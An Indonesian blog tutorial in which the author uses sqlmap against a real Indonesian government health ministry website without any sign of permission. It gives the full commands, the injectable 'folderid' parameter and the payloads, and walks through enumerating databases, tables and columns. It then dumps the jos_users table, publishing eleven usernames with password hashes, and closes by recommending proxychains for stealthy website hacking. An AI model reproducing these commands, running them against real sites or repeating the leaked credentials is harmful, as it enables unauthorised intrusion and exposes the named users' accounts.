sqlmap adalah tools untuk melakukan testing penetrasi sql injection pada suatu web, tools ini menurut saya, tools sql injection yang free paling lengkap untuk saat ini, walaupun ada havij, tapi menurut saya havij kurang advanced, havij lebih banyak dipakai oleh newbie newbie, karena memang kegunaan nya yang sangat simple untuk sekali attack sql injection.
saya akan selalu menggunakan flag default –threads dan –random-agent dengan kegunaan :
1 | --threads : max number sqlmap mencoba untuk membuka concurrent http connections. |
2 | --random-agent : load random user agent dari default sqlmap, |
1 | $ wc txt/user-agents.txt |
2 | 2078 23092 198475 txt/user-agents.txt |
1 | root@ubuntu:~/sqlmap-dev# ./sqlmap.py -u "URL" --random-agent --threads X --banner --dbs --tables --columns --dump --dumpall |
01 | root@ubuntu:~/sqlmap-dev# ./sqlmap.py -u "http://www.depkes.go.id/index.php/component/depkesdownload/index.php?option=com_depkesdownload&itemid=21&folderid=51" --random-agent --threads 10 --banner |
02 |
03 | sqlmap/1.0-dev (r4370) - automatic SQL injection and database takeover tool |
04 |
06 |
07 | [!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program |
08 |
09 | [*] starting at 22:09:14 |
10 |
11 | [22:09:14] [INFO] fetched random HTTP User-Agent header from file '/root/sqlmap-dev/txt/user-agents.txt': Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.9.1) Gecko/20090624 Firefox/3.5 |
12 | [22:09:15] [INFO] using '/root/sqlmap-dev/output/www.depkes.go.id/session' as session file |
13 | [22:09:15] [INFO] testing connection to the target url |
14 | [22:09:15] [INFO] testing if the url is stable, wait a few seconds |
15 | [22:09:16] [INFO] url is stable |
16 | ---8<------ snip |
17 | [22:11:31] [INFO] GET parameter 'folderid' is 'MySQL > 5.0.11 AND time-based blind' injectable |
18 | [22:11:31] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' |
19 | [22:11:34] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' |
20 | [22:11:36] [INFO] testing 'Generic UNION query with Microsoft Access () comment (NULL) - 1 to 10 columns' |
21 | GET parameter 'folderid' is vulnerable. Do you want to keep testing the others? [y/N] n |
22 | sqlmap identified the following injection points with a total of 445 HTTP(s) requests: |
23 | --- |
24 | Place: GET |
25 | Parameter: folderid |
26 | Type: boolean-based blind |
27 | Title: AND boolean-based blind - WHERE or HAVING clause |
28 | Payload: option=com_depkesdownload&itemid=21&folderid=51' AND 8184=8184 AND 'TEzv'='TEzv |
29 |
30 | Type: AND/OR time-based blind |
31 | Title: MySQL > 5.0.11 AND time-based blind |
32 | Payload: option=com_depkesdownload&itemid=21&folderid=51' AND SLEEP(5) AND 'ISyk'='ISyk |
33 | --- |
34 |
35 | [22:14:12] [INFO] the back-end DBMS is MySQL |
36 | [22:14:12] [INFO] fetching banner |
37 | [22:14:12] [INFO] retrieving the length of query output |
38 | [22:14:12] [INFO] retrieved: 6 |
39 | [22:14:21] [INFO] retrieved: 5.0.45 |
40 | web server operating system: Linux CentOS 5 |
41 | web application technology: Apache 2.2.3, PHP 5.1.6 |
42 | back-end DBMS: MySQL 5.0.11 |
43 | banner: '5.0.45' |
44 |
45 | [22:14:21] [WARNING] HTTP error codes detected during testing: |
46 | 404 (Not Found) - 198 times |
47 | [22:14:21] [INFO] Fetched data logged to text files under '/root/sqlmap-dev/output/www.depkes.go.id' |
48 |
49 | [*] shutting down at 22:14:21 |
pada awal injeksi menggunakan sqlmap, disarankan untuk men-fetch banner terlebih dahulu, dengan metode tebak tebak an injeksi ini sqlmap akan lebih gampang membuild road map dari jenis injeksi dbms si website, sekedar sharing saya pernah tidak men-fetch banner terlebih dahulu melainkan langsung dengan metode –dbs, namun hasilnya gagal, ketika dicoba lain kali dengan injeksi –banner sqlmap berhasil men-injeksi web tersebut, dan viola kesana nya pun sqlmap mudah untuk fetch data.
dari hasil injeksi fetch banner mysql, kita mendapatkan positive impact dari target, yaitu keluarnya hasil untuk versi DBMS yaitu : MySQL 5.0.11 dengan tipe injeksi MySQL Blind.
2. fetch user yang digunakan, dan db yang sedang digunakan dengan flag (–current-user dan –current-db)
langkah ke dua ialah analisis user yang dipakai di DBMS dan DB yang sedang digunakan pada website tersebut.
01 | root@ubuntu:~/sqlmap-dev# ./sqlmap.py -u "http://www.depkes.go.id/index.php/component/depkesdownload/index.php?option=com_depkesdownload&itemid=21&folderid=51" --random-agent --threads 10 --current-user --current-db |
02 |
03 | --------8<--- snip |
04 |
05 | [22:24:23] [INFO] the back-end DBMS is MySQL |
06 | web server operating system: Linux CentOS 5 |
07 | web application technology: Apache 2.2.3, PHP 5.1.6 |
08 | back-end DBMS: MySQL 5.0.11 |
09 | [22:24:23] [INFO] fetching current user |
10 | [22:24:23] [INFO] retrieving the length of query output |
11 | [22:24:23] [INFO] read from file '/root/sqlmap-dev/output/www.depkes.go.id/session': 20 |
12 | [22:24:46] [INFO] retrieved: website-in@localhost |
13 | current user: 'website-in@localhost' |
14 |
15 | [22:24:46] [INFO] fetching current database |
16 | [22:24:46] [INFO] retrieving the length of query output |
17 | [22:24:46] [INFO] retrieved: 6 |
18 | [22:24:55] [INFO] retrieved: portal |
19 | current database: 'portal' |
20 |
21 | [22:24:55] [INFO] Fetched data logged to text files under '/root/sqlmap-dev/output/www.depkes.go.id' |
22 |
23 | [*] shutting down at 22:24:55 |
selanjutnya kita melakukan fetching list database, dengan mengetahui list databse yang lain kita dapat bebas melakukan injeksi pada setiap database yang available untuk di injeksi.
01 | root@ubuntu:~/sqlmap-dev# ./sqlmap.py -u "http://www.depkes.go.id/index.php/component/depkesdownload/index.php?option=com_depkesdownload&itemid=21&folderid=51" --random-agent --threads 10 --dbs |
02 |
03 | --------8<--- snip |
04 |
05 | [22:36:06] [INFO] the back-end DBMS is MySQL |
06 | web server operating system: Linux CentOS 5 |
07 | web application technology: Apache 2.2.3, PHP 5.1.6 |
08 | back-end DBMS: MySQL 5.0.11 |
09 | [22:36:06] [INFO] fetching database names |
10 | [22:36:06] [INFO] fetching number of databases |
11 | [22:36:06] [INFO] retrieved: 2 |
12 | [22:36:08] [INFO] retrieving the length of query output |
13 | [22:36:08] [INFO] retrieved: 18 |
14 | [22:36:31] [INFO] retrieved: information_schema |
15 | [22:36:31] [INFO] retrieving the length of query output |
16 | [22:36:31] [INFO] retrieved: 6 |
17 | [22:36:40] [INFO] retrieved: portal |
18 | available databases [2]: |
19 | [*] information_schema |
20 | [*] portal |
21 |
22 | [22:36:40] [INFO] Fetched data logged to text files under '/root/sqlmap-dev/output/www.depkes.go.id' |
23 |
24 | [*] shutting down at 22:36:40 |
4. fetch list tables di database portal dengan flag (-D portal --tables)
1 | root@ubuntu:~/sqlmap-dev# ./sqlmap.py -u "http://www.depkes.go.id/index.php/component/depkesdownload/index.php?option=com_depkesdownload&itemid=21&folderid=51" --random-agent --threads 10 -D portal --tables |
berikut contoh list tables yang berhasil di injeksi dari database portal, ada 89 tables.
01 | root@ubuntu:~/sqlmap-dev/output/www.depkes.go.id# cat log |
02 |
03 | -----8<---- snip --- |
04 |
05 | Database: portal |
06 | [89 tables] |
07 | +------------------------------+ |
08 | | jos_assignments | |
09 | | jos_banner | |
10 | | jos_bannerclient | |
11 | | jos_bannertrack | |
12 | | jos_categories | |
13 | | jos_components | |
14 | | jos_contact_details | |
15 | | jos_content | |
16 | | jos_content_frontpage | |
17 | | jos_content_rating | |
18 | | jos_core_acl_aro | |
19 | | jos_core_acl_aro_groups | |
20 | | jos_core_acl_aro_map | |
21 | | jos_core_acl_aro_sections | |
22 | | jos_core_acl_groups_aro_map | |
23 | | jos_core_log_items | |
24 | | jos_core_log_searches | |
25 | | jos_downloads | |
26 | | jos_downloads_blob | |
27 | | jos_downloads_category | |
28 | | jos_downloads_classify | |
29 | | jos_downloads_containers | |
30 | | jos_downloads_file_classify | |
31 | | jos_downloads_files | |
32 | | jos_downloads_folders | |
33 | | jos_downloads_log | |
34 | | jos_downloads_repository | |
35 | | jos_downloads_reviews | |
36 | | jos_downloads_structure | |
37 | | jos_downloads_text | |
38 | | jos_groups | |
39 | | jos_hwdvidsantileech | |
40 | | jos_hwdvidscategories | |
41 | | jos_hwdvidsfavorites | |
42 | | jos_hwdvidsflagged_groups | |
43 | | jos_hwdvidsflagged_videos | |
44 | | jos_hwdvidsgroup_membership | |
45 | | jos_hwdvidsgroup_videos | |
46 | | jos_hwdvidsgroups | |
47 | | jos_hwdvidsgs | |
48 | | jos_hwdvidslogs_archive | |
49 | | jos_hwdvidslogs_favours | |
50 | | jos_hwdvidslogs_views | |
51 | | jos_hwdvidslogs_votes | |
52 | | jos_hwdvidsplugin | |
53 | | jos_hwdvidsrating | |
54 | | jos_hwdvidsss | |
55 | | jos_hwdvidsvideos | |
56 | | jos_jdownloads_cats | |
57 | | jos_jdownloads_config | |
58 | | jos_jdownloads_files | |
59 | | jos_jdownloads_license | |
60 | | jos_jdownloads_templates | |
61 | | jos_menu | |
62 | | jos_menu_types | |
63 | | jos_messages | |
64 | | jos_messages_cfg | |
65 | | jos_migration_backlinks | |
66 | | jos_mod_apotik | |
67 | | jos_mod_puskesmas | |
68 | | jos_mod_puskesmas15072011 | |
69 | | jos_mod_puskesmas24112010 | |
70 | | jos_mod_puskesmas_23012011 | |
71 | | jos_mod_puskesmas_old | |
72 | | jos_mod_rumah_sakit | |
73 | | jos_modules | |
74 | | jos_modules_menu | |
75 | | jos_newsfeeds | |
76 | | jos_permissions | |
77 | | jos_phocadownload | |
78 | | jos_phocadownload_categories | |
79 | | jos_phocadownload_licenses | |
80 | | jos_phocadownload_sections | |
81 | | jos_phocadownload_settings | |
82 | | jos_phocadownload_user_stat | |
83 | | jos_plugins | |
84 | | jos_poll_data | |
85 | | jos_poll_date | |
86 | | jos_poll_menu | |
87 | | jos_polls | |
88 | | jos_rokdownloads | |
89 | | jos_rokversions | |
90 | | jos_sections | |
91 | | jos_session | |
92 | | jos_stats_agents | |
93 | | jos_swmenufree_config | |
94 | | jos_templates_menu | |
95 | | jos_users | |
96 | | jos_weblinks | |
97 | +------------------------------+ |
setelah itu mari kita ke final step pada setiap langkah langkah menginjeksi suatu web, yaitu memfetch isi dari tables. karena tabel yang menarik dari list diatas yaitu tabel users, maka langsung kita fetch isi tabel tersebut
sebelumnya kita fetch dulu list kolum pada tabel tersebut, dan fetch data dari kolum hanya yang penting saja, kita fetch dengan flag (-D portal -T jos_users --columns)
01 | root@ubuntu:~/sqlmap-dev# ./sqlmap.py -u "http://www.depkes.go.id/index.php/component/depkesdownload/index.php?option=com_depkesdownload&itemid=21&folderid=51" --random-agent --threads 10 -D portal -T jos_users --columns |
02 |
03 | ----8<----snip |
04 |
05 | +---------------+---------------------+ |
06 | | Column | Type | |
07 | +---------------+---------------------+ |
08 | | activation | varchar(100) | |
09 | | block | tinyint(4) | |
10 | | email | varchar(100) | |
11 | | gid | tinyint(3) unsigned | |
12 | | id | int(11) | |
13 | | lastvisitDate | datetime | |
14 | | name | varchar(255) | |
15 | | params | text | |
16 | | password | varchar(100) | |
17 | | registerDate | datetime | |
18 | | sendEmail | tinyint(4) | |
19 | | username | varchar(150) | |
20 | | usertype | varchar(25) | |
21 | +---------------+---------------------+ |
22 |
23 | [02:39:42] [INFO] Fetched data logged to text files under '/root/sqlmap-dev/output/www.depkes.go.id' |
24 |
25 | [*] shutting down at 02:39:42 |
1 | root@ubuntu:~/sqlmap-dev# ./sqlmap.py -u "http://www.depkes.go.id/index.php/component/depkesdownload/index.php?option=com_depkesdownload&itemid=21&folderid=51" --random-agent --threads 10 -D portal -T jos_users -C username,password --dump |
01 | root@ubuntu:~/sqlmap-dev# cat output/www.depkes.go.id/log |
02 |
03 | ----------8<----snip |
04 |
05 | Database: portal |
06 | Table: jos_users |
07 | [11 entries] |
08 | +-------------------------------------------------------------------+---------------+ |
09 | | password | username | |
10 | +-------------------------------------------------------------------+---------------+ |
11 | | 35d1b3c70e13825c0d4a67843adbf6ef:sQEMDKp8NKGSLMMKP5DocOSMwO1uCV3l | admin | |
12 | | f45161dd4038a5946c1dbcc59dbc0d6a:JUYQ0bIg2mt0XrIotHzVRw4yTowVCgIi | andri | |
13 | | 06b60c7bbdd5e197810d9018c3640ccd:MXghhJp9fJc8uadkcrZC30dZhyn3JnK7 | dewi_roro | |
14 | | 1e41bc000f1461a1410823fcdd7f0c22:eNKOmRJO35Mxa5PqI8jJAxAR7mN4qPxO | ipunk | |
15 | | 30f9ade9382291ffaf41ba0e35fa54ca:EOnhJGXlt5LLl0cefNLleOYQ8OCCgloc | ismail | |
16 | | d8c27e4de63a2c48e4a66ec8d88160c8:I30jspHGk6lPca18gwX1k069vqopqnoc | isti | |
17 | | faf5fc5f3d5901d79a396c62cacdc639:dRzIfNbjgAkj5Bco281VE1y6PiaKQLLa | Miemie Widya | |
18 | | 42fac0d700127746caac2c225b1f0427:pGFxjurnXno3dLMZMxwhdGe65NsI0zDl | puskom | |
19 | | d7c49e113aca936ed03c452c71784e7b:7mABDrLJBxFSbLyiDTcCi2Xr5agcxeGc | rsud meureudu | |
20 | | 27a94db23c3d203edbcd7314a998bf9e:R3x0ypx8lbe7yrAylDbixbf0pDdZ2KDb | silver | |
21 | | 50a09da3b0d90b736e939862ef565c4d:YGJbFZxWVEayGlylKuyLvmY5wadgQy5K | supriyono | |
22 | +-------------------------------------------------------------------+---------------+ |
untuk melakukan full dump satu kolum bisa menggunakan flag (-D portal -T jos_users --columns --dump) namun isinya berantakan dikarenakan banyak jumlah kolum, jadi lebih baik kita fetch kolum yang dianggap perlu saja, berikut dari hasil full dump untuk tabel jos_users : jos_users.txt
hal terbaik dari teknik sql injection menggunakan tools ialah jika digabungkan dengan tools proxychains, yang akan menghasilkan tools hack website yang stealth, powerfull namun sederhana.
Enjoy..
1 komentar:
Keren
Gan klo misalnya access forbidden 403.. Cara bypassnya gmn ya Gan..
Men petunjuk
Posting Komentar